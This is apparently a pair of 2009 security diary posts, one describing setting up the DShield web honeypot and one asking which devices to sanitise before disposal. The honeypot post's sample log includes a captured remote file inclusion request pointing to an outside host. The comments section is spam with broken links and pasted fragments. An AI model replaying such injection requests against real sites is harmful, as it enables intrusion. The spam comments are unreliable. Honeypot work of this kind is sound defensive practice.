Webhoneypot fun

Published: 2009-03-26
Last Updated: 2009-03-27 06:42:17 UTC
by Mark Hofman (Version: 1)
1 comment(s)

37 days ago the DShield webhoneypot project released the first Alpha of the code.  I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty.   Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it. 

So here is a quick run down of my webhoneypot experience.  

Firstly I logged into DShield and under "My Information"  I entered the Honeypot URL and ticked the "Honeypot is Active" button.

Next to grab the code.  The code is hosted on Google and can be obtained here    The site has install information and several releases are available, the raw code, a debian package and a Mac OS X package.   Looking at the install instructions I decided to go with the debian package.   (Now before you chuckle it was because I only had about 15 minutes or so to get it done and like many time poor people I like shortcuts.  It was not because the install instructions are not good.  In fact quite the opposite.)

So I built a new Debian 5 VM on a virtualbox which was straight forward.  I only installed a very minimal system with Apache, and PHP5  About 10 minutes gone.  

After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions,  which took about 3 seconds or so.   It asks you what port number you would like to use, sets up the relevant start jobs etc.  In short it does pretty much everything for you.  Once you have completed this step you have a honeypot running on the machine and all you need to do is change the /opt/webhoneypot/etc/config.local file and enter your DShield userid (which will be your email address) and password in the file (the userid=yourdshieldemailaddress  and password=thepasswordfortheuserid   do not use " )  

The final step after this is was to open a browser and go to the web page.  When you hit the page you will get a message along the lines of "Check logfile for hashpassword".   This basically verifies that you have successfully connected to DShield.  You replace the password=thepasswordfortheuserid  line   with the hashpassword=738abc..... parameter from the log file and you are good to go. 

Revisit the web page with, for example, a robots.txt request and you will get a response.  When you look in the log file /opt/webhoneypot/logs/honey.... file  you will see an entry along the lines of  timestamp  IP-Address Delivered Template 123 .  If you see that, the log line was delivered (123 is just an example you will see different numbers).

Log into  DShield again and under the "My Weblogs" tag you should see your test log entries.  For example: 

Time

URL

Source

Target

11:11:33

GET /robots.txt HTTP/1.1

192.168.22.10

202.999.999.24

11:14:29

GET /robots.txt HTTP/1.1

192.168.22.10

202.999.999.24

11:12:36

GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1

192.168.22.10

202.999.999.24

Total time taken, twenty minutes.  Ten minutes to install an OS onto the VM and five minutes or so because I borked my VM's network connection.  A final five minutes to install and configure the Honeypot.  

The guys on the team have done a great job.  If you have a spare IP this is a great way to contribute.  Give it a go. 

Mark H - Shearwater 

For those of you that are students and think Honeypots might be something you are interested in, then check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .  

1 comment(s)

Sanitising media

Published: 2009-03-26
Last Updated: 2009-03-26 21:05:07 UTC
by Mark Hofman (Version: 1)
0 comment(s)

Pat asked an interesting question.  He, like many of us, has the requirement to make sure that information doesn't accidentally leave the organisation on equipment that is being disposed off.  

To stop this many of us will have procedures to sanitise or destroy media, but what exactly are you targeting?   Hard disks, CD, DVDs, USB/Flash Drives are all the obvious ones.  Blackberries, Iphones or MP3 players are less obvious devices. However what else should you cleanse or even destroy?

Here are some things that I thought off that could be included: 

  • Hard disks from Printers
  • Printer drums
  • Cameras
  • Digital photo Frames

Let me know what other devices you sanitise before leaving the organisation. 

Mark H 

0 comment(s)

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives